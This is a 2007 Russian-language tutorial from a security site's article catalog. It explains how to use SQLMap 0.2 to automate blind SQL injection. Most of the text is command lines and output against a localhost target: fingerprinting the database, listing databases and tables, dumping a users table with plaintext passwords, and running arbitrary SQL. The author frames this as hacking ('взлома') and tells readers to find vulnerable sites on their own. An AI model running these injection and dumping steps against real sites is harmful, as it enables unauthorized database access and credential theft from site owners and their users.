Воскресенье
22.12.2024
10:57
Приветствую Вас Гость | RSS
Главная | Каталог статей | Регистрация | Вход
Меню сайта

Категории каталога
Web [115]
Статьи по безопасности в интернете.

Начало » Статьи » Безопасность » Web

SQLMap 0.2 (мануал)
Программа предназначена для автоматизации blind SQL Injection. Скачать ее можно отсюда. Скачали?
Теперь разархивируем его. Еси вам не знакомо расширение ру то спокойно!!Это не зверь:))) Просто это программа написанная на относительно новом языке програмирования Питон (Python). Запускать нужно программу sqlmap.py. Чтобы запустить её нужно просто перекинуть ее в cmd. Для тех кто не знает. Чтобы запустить cmd нуно нажать на Start-->Run-->cmd. Запустили? Молодцы:)) Теперь чтобы юзать ее нуно опять кинуть прогу в cmd (или нажать на кнопку «вверх» если цмдм не закрывали) и набрать команду например –h что опять таки приведет список всех команд данной проги. Итак разобрались с этой частью? Идём вперед.
Хотел бы разачаровать всех ламеров потому что уязвимость вместо вас прога искать не будет. Уязвимый сай нужно сначала найти самому и только потом начать юзать прогу. Ну допустим сайт мы нашли например http://localhost/articles.php?id=1&cat=2. Допустим что нефильтруемая переменная это id. Нужные параметры для успешного взлома это:
-u http://localhost/blind/showcontent.php?id=TOKEN&cat=2
-t TOKEN
-d 1
Итак начнем:

--BANNER GRABBING:
[503] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --banner

sqlmap() v0.1 coded by belch

[*] starting at: 12:53:21

remote DBMS: MySQL

banner: '4.1.15-Debian_1ubuntu5-log'

[*] shutting down at: 12:53:22

--CURRENT USER:
[505] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --current-user
sqlmap() v0.1 coded by belch

[*] starting at: 02:01:01

remote DBMS: MySQL

current user: 'belch@localhost'

[*] shutting down at: 02:01:01

--CURRENT DATABASE
[506] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --current-database

sqlmap() v0.1 coded by belch

[*] starting at: 02:01:28

remote DBMS: MySQL

current database: 'blind'

[*] shutting down at: 02:01:28

--AVAILABLE PRESENT DBS
[509] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --get-dbs
sqlmap() v0.1 coded by belch

[*] starting at: 02:02:22

remote DBMS: MySQL

available database:

[*] information_schema
[*] blind
[*] mysql
[*] test

[*] shutting down at: 02:02:25

Дамп таблицы
Теперь давайте сделаем дамп таблицы. (db:blind).
Давайте достанем имена таблиц в db 'blind':

[510] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --database blind --get-tables

sqlmap() v0.1 coded by belch

[*] starting at: 02:03:20

remote DBMS: MySQL

-----------------------------
DATABASE: blind
-----------------------------
news
users
-----------------------------

[*] shutting down at: 02:03:21

DUMP OF 'news' table:

[511] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --database blind --table news --dump

sqlmap() v0.1 coded by belch

[*] starting at: 02:03:41

remote DBMS: MySQL

DATABASE: blind TABLE: news
-------------------------------------------------------------------------------------------------
|news |id |highlight
-------------------------------------------------------------------------------------------------
|ciao da daniele |1 |numero 1
|sempre ciao da daniele |2 |numero 2
|sempre sempre ciao da daniele |3 |numero 3
-------------------------------------------------------------------------------------------------

[*] shutting down at: 02:03:47

DUMP OF 'users' table:
[512] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --database blind --table users --dump

sqlmap() v0.1 coded by belch

[*] starting at: 02:04:05

remote DBMS: MySQL

DATABASE: blind TABLE: users
-------------------------------------
|username |password |id
-------------------------------------
|daniele |bellucci |1
|mancinelli |mancio |2
-------------------------------------

[*] shutting down at: 02:04:08

--ESECUZIONE SINGOLI STATEMENT:
[518] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 -e "select version()"

sqlmap() v0.1 coded by belch

[*] starting at: 02:06:15

remote DBMS: MySQL

select version(): '5.0.22-Debian_0ubuntu6.06-log'

None
[*] shutting down at: 02:06:16

При написании этой статьи был использован файл README в архиве. Хотел бы так же сказать чтобы сделать иньекцию при помощи данной прогу в уязвимом саёте обе переменные должны быть диманическими т.е числовыми. Например прога заработает только если URL такой:
http://localhost/articles.php?id=1&cat=2
Если он будет такой:
http://localhost/articles.php?id=news&cat=2 то прога не заработает выдав эрор что параметр news не динамический.

Категория: Web | Добавил: zythar (26.04.2007) | Автор: Devil
Просмотров: 5561 | Рейтинг: 0.0 |

Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Вход

Поиск по каталогу



Кто сейчас на сайте:
Онлайн всего: 1
Гостей: 1
Пользователей: 0

Друзья сайта

Статистика


Copyright KulX © 2007
ВНИМАНИЕ:Администрация не несет ответственности за публикуемые авторами материалы!
Хостинг от uCoz